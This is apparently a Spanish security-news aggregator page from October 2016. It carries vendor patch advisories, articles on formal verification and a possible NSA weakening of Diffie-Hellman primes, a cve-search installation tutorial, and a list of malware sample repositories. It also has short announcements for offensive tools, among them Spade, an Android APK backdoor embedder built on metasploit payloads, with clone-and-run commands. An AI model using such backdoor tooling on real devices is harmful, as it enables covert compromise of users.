Esta actualización soluciona un desbordamiento de entero, 46 problemas de corrupción de memoria, 20 vulnerabilidades de uso de memoria después de liberarla y un desbordamiento de búfer; todos ellos podrían permitir la ejecución de código. También se resuelven varios métodos para evitar restricciones de ejecución en la API Javascript y otro problema de salto de medidas de seguridad.

Los CVE asociados son: CVE-2016-1089, CVE-2016-1091, CVE-2016-6939 al CVE-2016-6979, CVE-2016-6988 y CVE-2016-6993 al CVE-2016-7019.

Adobe ha publicado las versiones 11.0.18 de Acrobat XI y Reader XI, Acrobat DC y Reader DC Continuous 15.020.20039 y Acrobat DC y Reader DC Classic 15.006.30243; las cuales solucionan los fallos descritos. Se encuentran disponibles para su descarga desde la página oficial, y a través del sistema de actualizaciones cuya configuración por defecto es la realización de actualizaciones automáticas periódicas.

Creative Cloud Desktop Application

Por último, una actualizaciónde seguridad para Creative Cloud Desktop Application que soluciona una vulnerabilidad de ruta de búsqueda sin comillas (CVE-2016-6935). Esto podría provocar el acceso a recursos en una ruta superior, posibilitando una escalada de privilegios local.

Más información:

Security updates available for Adobe Flash Player

https://helpx.adobe.com/security/products/flash-player/apsb16-32.html

Security Updates Available for Adobe Acrobat and Reader

https://helpx.adobe.com/security/products/acrobat/apsb16-33.html

Security update available for the Creative Cloud Desktop Application

https://helpx.adobe.com/security/products/creative-cloud/apsb16-34.html

Antonio Ropero

antonior@hispasec.com

Twitter: @aropero

Via:unaaldia.hispasec.com

Desarrollan código "a prueba de hackers"

October 12, 2016, 4:24 pm

≫ Next: Cómo la NSA podría haber "troyanizado los números primos" para descifrar tus comunicaciones

≪ Previous: Actualizaciones de seguridad para Adobe Flash Player, Acrobat, Reader y Creative Cloud Desktop Application

$

0

0

En verano de 2015 la Agencia de Proyectos de Investigación Avanzada de Defensa (en adelante DARPA) inició una serie de pruebas en las que un equipo de hackers debía intentar tomar el control de un helicóptero militar no tripulado conocido como Little Bird. Después de seis semanas, el Red Team fue incapaz de hackear el dron incluso contando más facilidades de las que podría soñar cualquier atacante externo...

El proyecto High-Assurance Cyber Military Systems (HACMS) de DARPA pone en marcha un nuevo viejo tipo de mecanismo de seguridad - un sistema de software que no puede ser comprometido. Las partes fundamentales del sistema informático del Little Bird eran impenetrables con la tecnología existente, y su código tan confiable como una prueba matemática.

La verificación formal

La tecnología que "repele" a los hackers es un estilo de programación de software conocido como verificación formal. A diferencia de la mayoría del código que está escrito de manera informal y cuya evaluación se basa principalmente en ver si funciona o no, el software verificado formalmente se lee como una prueba matemática: cada declaración es consecuencia lógica de la anterior. Un programa completo se puede probar con la misma seguridad que los matemáticos demuestran teoremas.

La aspiración de crear un software verificado formalmente ha existido casi desde la creación de la informática. Durante mucho tiempo parecía inalcanzable pero los avances en la última década en los llamados "métodos formales" están empezando a posibilitar su aplicación práctica. Hoy en día la verificación del software formal está siendo estudiada mediante colaboraciones académicas bien financiados, empresas militares y de tecnología de Estados Unidos, tales como Microsoft y Amazon.

Una especificación formal es una manera de definir qué, exactamente, hace un programa de ordenador. Y una verificación formal es una manera de probar más allá de toda duda que el código de un programa logra perfectamente esa especificación.

Por poner un ejemplo, piensa en un programa para ordenar una lista de números. Un programador tratando de formalizar una especificación para un programa tipo podría llegar a algo como esto:

    Por cada elemento j en una lista, asegúrese de que el elemento j ≤ j + 1

Sin embargo, esta especificación formal - garantizar que todos los elementos de una lista es menor que o igual al elemento que le sigue - contiene un error: El programador asume que la salida será una permutación de la entrada. Es decir, dada la lista [7, 3, 5], se espera que el programa volverá [3, 5, 7] y así satisfacer la definición. Sin embargo, la lista [1, 2] también satisface la definición ya que "es una lista ordenada, pero no la lista ordenada probable que esperábamos", comenta Brian Parno de Investigación de Microsoft.

En otras palabras, es difícil de traducir una idea que tiene para lo que debe hacer un programa en una especificación formal que excluye toda posible (pero incorrecta) interpretación de lo que desea que el programa debe hacer.

Y el ejemplo anterior es para algo tan simple como un programa de clasificación. Ahora imagina tomando algo mucho más abstracto que la clasificación, tales como la protección de una contraseña. "¿Qué significa eso matemáticamente? Definiéndola puede implicar escribir una descripción matemática de lo que significa guardar un secreto, o lo que significa para un algoritmo de cifrado ser seguro" comenta Parno. "Todas estas son preguntas que nosotros, y muchos otros, han estudiado y realizado progresos, pero puede ser muy sutil hacerlo bien".

Retomando la técnica

Un programa que incluye la información de verificación formal puede ser cinco veces más largo que un programa tradicional que fue escrito para lograr el mismo fin. Además del esfuerzo que suponer readaptar en cada paso el software a la lógica de verificación formal, todo ello han hecho que esta técnica se haya ido estancando a lo largo de los años.

Sin embargo, ahora se ha visto relanzada por la preocupación por la seguridad informática en el mundo cada vez más interconectado y la Internet de las Cosas (IoT) y los avances en la tecnología que subyace en métodos formales: las mejoras en los programas de prueba-asistente como Coq e Isabelle que soportan los métodos formales; el desarrollo de nuevos sistemas lógicos (llamado teorías de tipo dependiente) que proporcionan un framework; y las mejoras en lo que se llama "semántica operacional" - en esencia, un lenguaje que tiene las palabras adecuadas para expresar lo que se supone que un programa tiene que hacer.

El proyecto HACMS

El proyecto HACMS ilustra cómo es posible generar grandes garantías de seguridad mediante la especificación de una pequeña parte de un sistema informático. El primer objetivo del proyecto era crear un quadcopter recreativo no hackeable. El software off-the-shelf que dirigía el quadcopter era monolítico, lo que significa que si un atacante rompía una sola pieza de la misma tenía acceso a todo. Por lo tanto y durante dos años, el equipo dividió el código del ordenador de control de la misión del quadcopter en particiones.

El equipo también volvió a escribir la arquitectura de software utilizando lo que Fisher, el director del proyecto fundación HACMS, llama "bloques de construcción de alta seguridad" - herramientas que permiten a los programadores probar la fidelidad de su código. Uno de esos bloques de construcción verificados viene con una prueba que garantiza que alguien con acceso dentro de una partición no será capaz de escalar sus privilegios y conseguir acceso a otras particiones.

Más tarde, los programadores de HACMS instalaron este software particionado en Little Bird. En la prueba contra los hackers del Red Team, les proporcionaron acceso a una partición que controla ciertos aspectos del helicóptero teledirigido, como la cámara, pero no a las funciones esenciales. Y los hackers fueron matemáticamente bloqueados.

Un año después de las pruebas con Little Bird, DARPA ha estado aplicando las herramientas y técnicas del proyecto HACMS a otras áreas de la tecnología militar, como los satélites y los camiones auto-conducidos.

Más proyectos en liza

Los ingenieros de software de Microsoft Research tienen en curso dos ambiciosos proyectos de verificación formal. El primero, llamado Everest, es crear una versión verificada de HTTPS, y la segunda es la creación de especificaciones verificadas para los sistemas ciber-físicos complejos, tales como aviones no tripulados. Así que esto es sólo el principio... ¿del fin del hacking? No lo creo...

Fuente: Hacker-Proof Code Confirmed

Via:www.hackplayers.com

Cómo la NSA podría haber "troyanizado los números primos" para descifrar tus comunicaciones

October 12, 2016, 11:43 pm

≫ Next: Dracnmap - Exploit Network and Gathering Information with Nmap

≪ Previous: Desarrollan código "a prueba de hackers"

$

0

0

Desde que los documentos filtrados por Edward Snowden salieron a la luz el mundo se ha estado haciendo muchas preguntas por los detalles técnicos de cómo lo hacían. Casos como la pertenencia de las principales empresas tecnológicas norteamericanas al programa PRISM, han ido recibiendo respuestas poco a poco después, como el caso de Yahoo! del que ya se sabe que escaneo los correos electrónicos de sus clientes para filtrar datos al gobierno de Estados Unidos, usando una tecnología para escanear el contenido de los mensajes que entran y salen de sus sistemas en tiempo real.

Figura 1: Cómo la NSA podría haber "troyanizados los números primos" para descifrar tus comunicaciones

Al final, PRISM es un programa fácil de saber cómo lo podrían haber implementado, ya que se basa en forzar a que cada compañía, con el uso de la legislación del Acta de Patriotismo, a cumplir la ley que en Estados Unidos se aprobaron. Son empresas de ese país, que deberían cumplirla.

Figura 2: Diapositiva del programa PRISM

Sin embargo, de todos los programas que salieron a la luz pública, los que tenían que ver con las técnicas de criptografía de las comunicaciones son los que más han llamado la atención de los investigadores. Saber cómo los miembros de la NSA tenían la capacidad de descifrar las comunicaciones por medio del programa TURBULENCE o BULLRUN han tenido a las mentes más prominentes investigando en cuáles podrían ser las puertas que estuvieran utilizando. 

Figura 3: Yahoo escaneó los e-mails de sus clientes

De aquellas investigaciones han salido artículos académicos que explican casos como el descifrado de los datos del iPhone 5C con la técnica de NAND Mirroring o el bug de LogJam, y un buen número de vulnerabilidades explotables en muchos de los sistemas de cifrado utilizados comúnmente. 

Figura 4: Programa BULLRUN de la NSA

Puesto esto en perspectiva, parece que el programa de BULLRUN, incluía una parte en la que la NSA podría estar influyendo en los estándares de cifrado, así como en las implementaciones de los mismos, tal y como recogía en un artículo de hace ya más de tres años que llamé "Cómo la NSA mató el espíritu de Internet".  Los investigadores pusieron los ojos encima de los sistemas de cifrado. Uno tras otro, buscando dónde podrían estar esos fallos, y rápidamente el número de implementaciones fallidas dejó atónito al mundo.

Casos como el GoTo Fail en la verificación de los certificados de iPhone, que llevó después a una reinserción de un algoritmo debilitado en iOS7, o el de GNU/TLS más las sospechas en TrueCrypt sumado al bug de OpenSSHpodrían ser la consecuencia de este programa. ¿Cómo podrían tantos sistemas de cifrado tener estos bugs?

Figura 5: Artículo en Wired hablando del programa BULLRUN

El número de vulnerabilidades que han aparecido en productos de seguridad, es alto, y aún así se ven casos que van desde investigaciones que explican como se puede producir el robo de claves de cifrado de GNUPG por medio de técnicas Tempest por la existencia de implementaciones "ruidosas", hasta estudios que demostraron el pasado año que los números primos utilizados en la fase de negociación del algoritmo Diffie-Hellman para el intercambio de claves eran en el 56% de los casos un número de un conjunto de diez, y que en total, analizando los resultados obtenidos solo se utilizaban 68.000 valores distintos del total del conjunto de 1024-bits que podrían usarse.

Figura 6: Resultados empíricos al revisar las negociaciones DH en Alexa Top 1 Millón

Las sospechas llevaban a pensar que, si alguien pudiera incidir en los números primos que se utilizan como base para los algoritmos de generación de números aleatorios, se podría conseguir que esa aleatoriedad no fuera tal y por tanto incidir en el resultado cifrado final del proceso para, en tiempo útil, poder descifrar dicha comunicación. Y este es el estudio que han publicado esta semana pasada los investigadores de las universidades de Pensilvania y Lorraine. 

Figura 7: Paper que describe la posibilidad de hacer un ataque efectivo tamizando los números primos

En su trabajo se centran en ver cómo si se eligen los parámetros semilla en los algoritmos utilizados en la generación de números primos con alguna singularidad específica se puede llegar a conseguir un sistema que permita calcular en tiempo útil todos los factores posibles y conseguir descifrar la comunicación. Un caso concreto es el uso de los valores por defecto como semilla del algoritmo DUAL_EC DRBG (Dual Elliptic Curve Deterministic Random Bit Generator) que ha sido descubierto ya en el código de uno de los productos de cifrado más populares inyectado por algún atacante con los valores de semilla modificados.

Figura 8: Juniper Networks reconoce que le inyectaron este bug

Con esta inyección, el tiempo de procesado de los cálculos necesarios para descifrar una clave se reduce hasta tiempos de 80 minutos - utilizando hardware dedicado de gran potencia - algo que por supuesto está al alcance de una organización como la NSA.

Figura 9: Tiempo necesario para el experimento

Visto este estudio, sabiendo que el conjunto de números está limitado al conjunto de números primos de 1024-bits, y pudiendo incidir en la semilla de la generación de los mismos para modificar la probabilidad de unos sobre otros aprovechando la dependencia de los algoritmos de aleatorización en parámetros de inicialización que pueden ser configurados, los investigadores determinan que cualquier sistema que utilice claves de 1024-bits está potencialmente expuesto a ser descifrado.

Figura 10: Consideraciones finales del artículo

La conclusión, al final, lleva a pensar en sistemas de 2048 que dificulten el proceso a cualquier sistema que intenten modificar las probabilidades de elección de claves o a realizar una auditoría de las configuraciones de todos los parámetros de configuración de todos los algoritmos usados en la generación de claves, desde los sistemas de elección de números aleatorios hasta los sistemas de generación de números primos, ya que cualquier inyección de un cambio de probabilidades permitiría una reducción del tiempo de procesado de las claves.

Saludos Malignos!

Sigue Un informático en el lado del mal - Google+RSS0xWord

Via:www.elladodelmal.com

Dracnmap - Exploit Network and Gathering Information with Nmap

October 13, 2016, 7:18 am

≫ Next: cve-search: una herramienta para realizar búsquedas de vulnerabilidades de forma local

≪ Previous: Cómo la NSA podría haber "troyanizado los números primos" para descifrar tus comunicaciones

$

0

0

Dracnmap is an open source program which is using to exploit the network and gathering information with nmap help. Nmap command comes with lots of options that can make the utility more robust and difficult to follow for new users. Hence Dracnmap is designed to perform fast scaning with the utilizing script engine of nmap and nmap can perform various automatic scanning techniques with the advanced commands.

Screenshot

Getting Started

git clone https://github.com/Screetsec/Dracnmap.git
cd Dracnmap
chmod +x Dracnmap.sh
sudo ./Dracnmap.sh or sudo su ./Dracnmap.sh

Requirements

• A linux operating system. We recommend Kali Linux 2 or Kali 2016.1 rolling / Cyborg / Parrot / Dracos / BackTrack / Backbox / and another operating system ( linux )
  
• Must install nmap
  

Tutorial
you can visit my channel : https://www.youtube.com/channel/UCpK9IXzLMfVFp9NUfDzxFfw

Credits

• Thanks to allah and Screetsec [ Edo -maland- ]
• Dracos Linux from Scratch Indonesia ( Awesome Penetration os ), you can see in http://dracos-linux.org/
• Offensive Security for the awesome OS ( http://www.offensive-security.com/ )
• http://www.kali.org/ "
  
• Jack Wilder admin in http://www.linuxsec.org
• And another open sources tool in github
• Uptodate new tools hacking visit http://www.kitploit.com
• My Friends ( Boy Suganda )

Download Dracnmap

Via:www.kitploit.com

cve-search: una herramienta para realizar búsquedas de vulnerabilidades de forma local

October 13, 2016, 7:59 am

≫ Next: Google publica Chrome 54 y corrige 21 vulnerabilidades

≪ Previous: Dracnmap - Exploit Network and Gathering Information with Nmap

$

0

0

Queramos o no, cuando buscamos vulnerabilidades conocidas en bases de datos de CVEs públicas estamos filtrando información sensible como los productos de software y plataformas que tenemos y/o estamos auditando. Llamarme paranoico pero cuando vi una herramienta que se bajaba las bases de datos de vulnerabilidades y permitía hacer búsquedas locales más rápidas y limitando las peticiones sensibles hacia Internet no dudé en probarla.

Se trata de cve-search, una herramienta para importar CVE (Common Vulnerabilities and Exposures) y CPE (Common Platform Enumeration) a una base de datos MongoDB para facilitar las búsquedas y el tratamiento de CVEs.

cve-search incluye un backend para almacenar vulnerabilidades e información relacionada, un interfaz web intuitivo para buscar y administrar vulnerabilidades, una serie de herramientas para realizar peticiones al sistema y un API web como interfaz.

cve-search lo utilizan ya muchas organizaciones incluyendo los servicios incluyendo el CIRCL (Computer Incident Response Center Luxembourg).

Bases de datos y recopilaciones

La base de datos MongoDB llamada cvedb tiene 11 recopilatorios:

• cves (Common Vulnerabilities and Exposure items) - fuente NVD NIST
• cpe (Common Platform Enumeration items) - fuente NVD NIST
• vendor (Official Vendor Statements on CVE Vulnerabilities) - fuente NVD NIST
• cwe (Common Weakness Enumeration items) - fuente NVD NIST
• capec (Common Attack Pattern Enumeration and Classification) - fuente NVD NIST
• ranking (reglas de ranking por grupo) - local cve-search
• d2sec (referencias de exploiting de D2 Elliot Web Exploitation Framework) - fuente d2sec.com
• vFeed (referencias cruzadas con ids CVE (e.g. OVAL, OpenVAS, ...)) - fuente vFeed - proprietary feed - MITRE Reference Key/Maps preferible
• ms - (Microsoft Bulletin (Security Vulnerabilities and Bulletin)) - fuente Microsoft
• exploitdb (Offensive Security - Exploit Database) - fuente offensive security
• info (metadatos de cada recopilatorio como última modificación) - local cve-search

Redis tiene 3 base de datos:

• El caché cpe (Common Platform Enumeration) - fuente MongoDB cvedb collection cpe
• La base de datos de notificaciones - fuente cve-search
• La base de datis de referencias CVInterfaz web
  E es una bd de referencias cruzadas de CVE ids contra IDs de fabricantes - source NVD NIST/MITRE

Instalación (en Ubuntu 16.04)

Primero clonamos el repositorio e instalamos las dependencias de Python:

https://github.com/cve-search/cve-search.git
sudo apt-get install python3-pip
sudo pip3 install -r requirements.txt

A continuación instalamos MongoDB y configuramos el servicio:

sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv 0C49F3730359A14518585931BC711F9BA15703C6
echo "deb http://repo.mongodb.org/apt/ubuntu xenial/mongodb-org/3.3 multiverse" | sudo tee /etc/apt/sources.list.d/mongodb-org-3.4.list
sudo apt-get update
sudo apt-get install -y mongodb

vi /etc/systemd/system/mongod.service

[Unit]
Description=High-performance, schema-free document-oriented database
After=network.target
Documentation=https://docs.mongodb.org/manual

[Service]
User=mongodb
Group=mongodb
ExecStart=/usr/bin/mongod --quiet --config /etc/mongod.conf

[Install]
WantedBy=multi-user.target

sudo service mongobd start

Inicializando la base de datos

./sbin/db_mgmt.py -p

Importing CVEs for year 2002
Importing CVEs for year 2003
Importing CVEs for year 2004
Importing CVEs for year 2005
Importing CVEs for year 2006
Importing CVEs for year 2007
Importing CVEs for year 2008
Importing CVEs for year 2009
Importing CVEs for year 2010
Importing CVEs for year 2011
Importing CVEs for year 2012
Importing CVEs for year 2013
Importing CVEs for year 2014
Importing CVEs for year 2015
Importing CVEs for year 2016

./sbin/db_mgmt_cpe_dictionary.py
Preparing [##################################################] 115175/115175

./sbin/db_updater.py -c

INFO:root:Starting cves
Preparing [##################################################] 241/241
INFO:root:cves has 79360 elements (18 update)
INFO:root:Starting cpe
Preparing [##################################################] 115175/115175

INFO:root:cpe has 115102 elements (55151 update)
INFO:root:Starting vfeed
Traceback (most recent call last):
  File "/home/vmotos/Vicente/tools/cve-search/sbin/db_mgmt_vfeed.py", line 46, in <module>
    t.extract('vfeed.db', path=tmppath)
  File "/usr/lib/python3.5/tarfile.py", line 2027, in extract
    tarinfo = self.getmember(member)
  File "/usr/lib/python3.5/tarfile.py", line 1736, in getmember
    tarinfo = self._getmember(name)
  File "/usr/lib/python3.5/tarfile.py", line 2317, in _getmember
    members = self.getmembers()
  File "/usr/lib/python3.5/tarfile.py", line 1747, in getmembers
    self._load()        # all members, we first have to
  File "/usr/lib/python3.5/tarfile.py", line 2340, in _load
    tarinfo = self.next()
  File "/usr/lib/python3.5/tarfile.py", line 2271, in next
    self.fileobj.seek(self.offset - 1)
  File "/usr/lib/python3.5/gzip.py", line 366, in seek
    return self._buffer.seek(offset, whence)
  File "/usr/lib/python3.5/_compression.py", line 143, in seek
    data = self.read(min(io.DEFAULT_BUFFER_SIZE, offset))
  File "/usr/lib/python3.5/gzip.py", line 480, in read
    raise EOFError("Compressed file ended before the "
EOFError: Compressed file ended before the end-of-stream marker was reached
INFO:root:vfeed has 0 elements (0 update)
INFO:root:Starting vendor
Cannot open url https://nvd.nist.gov/download/vendorstatements.xml.gz. Bad URL or not connected to the internet?
INFO:root:vendor has 0 elements (0 update)
INFO:root:Starting cwe
Preparing [##################################################] 719/719
INFO:root:cwe has 719 elements (719 update)
INFO:root:Starting capec
Preparing [##################################################] 463/463
INFO:root:capec has 463 elements (463 update)
INFO:root:Starting redis-cache-cpe
Redis server not running on localhost:6379
INFO:root:redis-cache-cpe updated
INFO:root:Starting d2sec
{'url': 'http://www.d2sec.com/exploits/lionwiki_3.0.3_lfi.html', 'id': 'CVE-2009-3534', 'name': 'LionWiki 3.0.3 LFI'}
.....

Preparing [##################################################] 304/304
INFO:root:d2sec has 265 elements (265 update)
INFO:root:Starting ms
INFO:root:ms has 815 elements (815 update)
INFO:root:Starting redis-nist-ref
Redis server not running on localhost:6379
INFO:root:redis-nist-ref has 0 elements (0 update)
INFO:root:Starting exploitdb

Indexación

./sbin/db_fulltext.py

Interfaz web

pip install Flask-PyMongo

cd ./web
 python3 ./index.py







Uso

Puedes buscar en la base de datos con search.py:

./bin/search.py -p cisco:ios:12.4
./bin/search.py -p cisco:ios:12.4 -o json
./bin/search.py -f nagios -n
./bin/search.py -p microsoft:windows_7 -o html

Si quieres buscar todas las vulnerabilidades de WebEx y sólo mostrar las referencias oficiales del fabricante:

./bin/search.py -p webex: -o csv  -v "cisco"

También es posible volcar un json para un ID CVE específico:

./bin/search.py -c CVE-2010-3333

O puedes usar un bot XMPP:

./bin/search_xmpp.py -j mybot@jabber.org -p strongpassword

Volcar los dos últimos CVEs en formato RSS o ATOM:

./bin/dump_last.py -f atom -l 2

O mezclarlo con expresiones regulares y comandos. Como por ej.

Sacar los CPEs de un fichero XML de salida de nmap:

rgrep -Eio ".*?" escaneo.xml --color | awk -F'>' '{print $2}' | cut -d '<' -f1 | sort -u

U obtener el número de vulnerabilidades con CVSS mayor que 6:

./bin/search.py -p cisco | grep "CVSS" | cut -d ":" -f 2 | sort | cut -d "." -f1 | egrep "10|[6-9]" | grep -v "0|1||2||3||4||5" | wc -l

Ya véis la flexibilidad y el juego que da esta herramienta. Podéis encontrar más información y funcionalidades en su Github:

https://github.com/cve-search/cve-search

Via:www.hackplayers.com

Google publica Chrome 54 y corrige 21 vulnerabilidades

October 13, 2016, 1:52 pm

≫ Next: Spade - Android APK Backdoor Embedder

≪ Previous: cve-search: una herramienta para realizar búsquedas de vulnerabilidades de forma local

$

0

0

Google anuncia una nueva versión de su navegador Google Chrome 54. Se publica la versión 54.0.2840.59 para las plataformas Windows, Mac y Linux, que junto con nuevas funcionalidades y mejoras, además viene a corregir 21 nuevas vulnerabilidades.

Entre las mejoras incluidas cabe destacar que se prioriza el uso de HTML5 frente a la ejecución de Flash. Algo que se puede hacer especialmente notable en la reproducción de vídeos de YouTube.

Respecto a las vulnerabilidades corregidas, como es habitual, Google solo proporciona información sobre los problemas reportados por investigadores externos o los considerados de particular interés. En esta ocasión, aunque se han solucionado 21 nuevas vulnerabilidades, solo se facilita información de 13 de ellas (seis de gravedad alta, seis de importancia media y una baja).

Se corrigen vulnerabilidades por cross-site scriptings en Blink y en Bookmarks, un desbordamiento de búfer en Blink y problemas por uso de memoria después de liberar en PDFium, Blink y en Internals. Además también se solucionan falsificaciones de URLs y de la interfaz de usuario, salto de la política de orígenes cruzados en Blink y una lectura fuera de límites en DevTools. Se han asignado los CVE-2016-5181 al CVE-2016-5193.

También del trabajo de seguridad interno, varias correcciones procedentes de auditoría interna, pruebas automáticas y otras iniciativas (CVE-2016-5194). Según la política de la compañía las vulnerabilidades anunciadas han supuesto un total de 29.133,7 dólares en recompensas a los descubridores de los problemas.

Esta actualización está disponible a través de Chrome Update automáticamente en los equipos así configurados o a través de "Información sobre Google Chrome" (chrome://chrome/). O descargar directamente desde: google.com/chrome.

Más información:

Stable Channel Update

http://googlechromereleases.blogspot.com.es/2016/08/stable-channel-update-for-desktop_31.html

una-al-dia (03/09/2016) Google publica Chrome 53 y corrige 33 vulnerabilidades

http://unaaldia.hispasec.com/2016/09/google-publica-chrome-53-y-corrige-33.html

Antonio Ropero

antonior@hispasec.com

Twitter:@aropero

Via:unaaldia.hispasec.com

---

Spade - Android APK Backdoor Embedder

October 14, 2016, 7:36 am

≫ Next: Actualizaciones para múltiples dispositivos Cisco

≪ Previous: Google publica Chrome 54 y corrige 21 vulnerabilidades

$

0

0

Quick and handy APK backdoor embedder with metasploit android payloads.

Requirements

• metasploit

Installation and execution
Then you can download smap by cloning the Git repository:

git clone https://github.com/suraj-root/spade.git
cd spade/
./spade.py

Demo video


Video YouTube:

Download Spade

Via:www.kitploit.com

Actualizaciones para múltiples dispositivos Cisco

October 14, 2016, 1:59 pm

≫ Next: Recopilatorio de sitios que contienen muestras de malware de Itay Cohen

≪ Previous: Spade - Android APK Backdoor Embedder

$

0

0

Cisco ha publicado seis boletines de seguridadpara solucionar otras tantas vulnerabilidades en múltiples productos que podrían permitir a atacantes provocar condiciones de denegación de servicio, ejecutar código arbitrario o acceder al dispositivo sin autorización.

Solo uno de los problemas es considerado crítico y afecta a Cisco Meeting Server, mientras que otros problemas de gravedad media afectan a Cisco Wide Area Application Services, Cisco Unified Communications Manager, Cisco Prime Infrastructure, Evolved Programmable Network Manager, Cisco Finesse y Cisco cBR-8 Converged Broadband Router.

Cisco Cisco Meeting Server

El problema más grave, con CVE-2016-6445, afecta al servicio Extensible Messaging and Presence Protocol (XMPP) de Cisco Meeting Server (CMS) y podría permitir a un atacante remoto sin autenticar acceder al sistema como un usuario legítimo.

Se ven afectadas las versiones de Cisco Meeting Server anteriores a la 2.0.6 con XMPP activo. También afecta a Acano Server anteriores a 1.8.18 y anteriores a 1.9.6 con XMPP activo.

Cisco ha publicado las siguientes versiones actualizadas para los sistemas afectados:

Acano Server 1.8.18

Acano Server 1.9.6

Cisco Meeting Server 2.0.6

Las actualizaciones de firmware pueden descargarse desde Software Center en Cisco.com accediendo a Products > Conferencing > Video Conferencing > Multiparty Conferencing > Meeting Server > Meeting Server 1000 > TelePresence Software.

Vulnerabilidades de gravedad media corregidas

Una vulnerabilidad (CVE-2016-6437) en la administración de la caché de sesión SSL de los Cisco Wide Area Application Services (WAAS) podría permitir a un atacante remoto sin autenticar provocar una condición de denegación de servicio (DoS) por un elevado consumo del disco duro.

Un problema, con CVE-2016-6440, de falsificación de datos en un iframe de una página web afecta a Cisco Unified Communications Manager (CUCM). Por otra parte, existe una vulnerabilidad (con CVE-2016-6443) de inyección SQL en Cisco Prime Infrastructure y en Evolved Programmable Network Manager SQL.

También se ha confirmado una vulnerabilidad (con CVE-2016-6438) en el software Cisco IOS XE en routers Cisco cBR-8 Converged Broadband podría permitir a un atacante remote sin autenticar provocar un cambio en la integridad de la configuración en el dispositivo afectado.

Por último, una vulnerabilidad de cross-site request forgery (CSRF) contra la interfaz web de Cisco Finesse (CVE-2016-6442). Este es el único problema para el que no se han publicado actualizaciones.

Más información:

Cisco Wide Area Application Services Central Manager Denial of Service Vulnerability

http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161012-waas

Cisco Unified Communications Manager iFrame Data Clickjacking Vulnerability

http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161012-ucm

Cisco Prime Infrastructure and Evolved Programmable Network Manager Database Interface SQL Injection

http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161012-prime

Cisco Meeting Server Client Authentication Bypass Vulnerability

http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161012-msc

Cisco Finesse Cross-Site Request Forgery Vulnerability

http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161012-fin

Cisco cBR-8 Converged Broadband Router vty Integrity Vulnerability

http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161012-cbr-8

Antonio Ropero

antonior@hispasec.com

Twitter: @aropero

Via:unaaldia.hispasec.com

Recopilatorio de sitios que contienen muestras de malware de Itay Cohen

October 14, 2016, 3:59 pm

≫ Next: 20 de Octubre: Data-Driven Decissions - Let your data Speak

≪ Previous: Actualizaciones para múltiples dispositivos Cisco

$

0

0

Los analistas de malware siempre tienen la necesidad de obtener nuevas muestras para analizarlas con el fin de aprender, entrenar o desarrollar nuevas técnicas y defensas. Si hace unos años veíamos un imponente repositorio de recursos de malware por Claus Valca, hoy os traemos otro de Itay Cohen en su blog Megabeets, también con una buena lista de repositorios, bases de datos y recursos que usa a diario. Algunos de ellos se actualizan con frecuencia y otros no. Eso sí, tener siempre cuidado al usar estos sitios, casi todos contienen archivos maliciosos. ¡Utilizar con precaución!

• theZoo: es un proyecto mantenido por Yuval Nativ (ytisf) que recopila una buena lista de malware para su análisis.
• OpenMalware: proyecto de Danny Quis.
• contagio: un gran colección de las últimas muestras de malware, amenazas, observaciones y análisis.
• Hybrid Analysis: servicio gratuito de malware ofrecido por Payload Security. Es posible subir ficheros para un análisis dinámico y estático y también pueden descargarse muestras subidas por otros.
• AVCaesar: es un repositorio y un motor de análisis de malware, desarrollado por malware.lu.
• Das Malwerk: recolecta ejecutables maliciosos de toda clase de sitios "oscuros" de Internet.
• KernelMode.info: una comunidad muy activa orientada al análisis de malware y al desarrollo del kernel.
• MalShare: es un esfuerzo de colaboración para crear un repositorio de software malicioso público impulsado por la comunidad que trabaja para construir herramientas adicionales en beneficio de la comunidad de la seguridad en general.
• MalwareBlacklist: repositorio de URLs y muestras de malware.
• Malwr: es un servicio de análisis de malware gratuito y una comunidad lanzada en enero de 2011. Puedes subir archivos y recibir los resultados con un completo análisis y también descargar las muestras subidas por otros.
• Virusign: permite la descarga de malware y ordena los ejecutables por orden de importancia. Además los analizan para crear nuevas firmas.
• VirusShare: un repositorio de muestras de malware para proporcionar a los investigadores de seguridad, los que trabajan en respuesta ante incidentes, los analistas forenses y a la curiosidad morbosa.
• Malwarebytes Research Center: foros donde se postean nuevas amenazas y urls.
• Mobile Malware (Google Group): una lista de correo para la investigación de malware móvil. Este grupo permite material relacionado con nuevas muestras de malware móviles, análisis, nuevas técnicas, preguntas relacionadas con el campo y otros materiales relacionados.
• SecuBox Lab: repositorio del equipo francés llamado (Malware Analysis & Diagnostic)
• Malekal: recopilatorio de malware de Malekal.
• Malc0de: una base de datos actualizada con los dominios y hostings que contienen ejecutables maliciosos.
• VX Vault: colección de malware y urls de S!Ri.URZ.
• Scumware: tienen una base de datos que contiene datos como: URL, MD5, IP, TLD, etc
• Sucuri Malware Labs: últimas detecciones encontradas por Sucuri Labs.
• Zeus Tracker: permite hacer un seguimiento a los servidores C&C de Zeus y a los hosts maliciosos que contienen ejecutables.
• Fedeo Tracker: una lista de servidores C&C de Fedeo.
• Cybercrime Tracker: lista de paneles C&C de algunas botnets activas.

Fuente: Fantastic Malware and Where to Find Them

Via:www.hackplayers.com

20 de Octubre: Data-Driven Decissions - Let your data Speak

October 15, 2016, 12:27 am

≫ Next: arch-audit - An utility like pkg-audit for Arch Linux

≪ Previous: Recopilatorio de sitios que contienen muestras de malware de Itay Cohen

$

0

0

El próximo jueves 20 de Octubre es un día importante para nosotros. Ese día vamos a presentar en Telefónica una nueva unidad de negocio centrada en el mundo del Big Data. Al igual que en el caso de la seguridad informática donde tenemos ElevenPaths, ahora nace una nueva organización dentro del área de CDO para acompañar a nuestros clientes en el proceso de transformación que muchos están siguiendo para convertirse en empresas Data-Driven.

Figura 1: 20 de Octubre "Data-Driven Decissions - Let your data speak"

La capacidad de procesar grandes cantidades de datos a costes asequibles, hace que las empresas puedan generar inteligencia de datos que antes eran impensables. Desde utilizar toda la información de que dispone una organización como Telefónica para planificar mejor los despliegues de la red, hasta detectar averías en algún servicio, pasando por modelos de reducción de costes por eficiencias en la gestión o el modelado de sistemas predictivos que ayuden a dimensionar mejor las capacidades que se deben provisionar para dar un determinado servicio. 

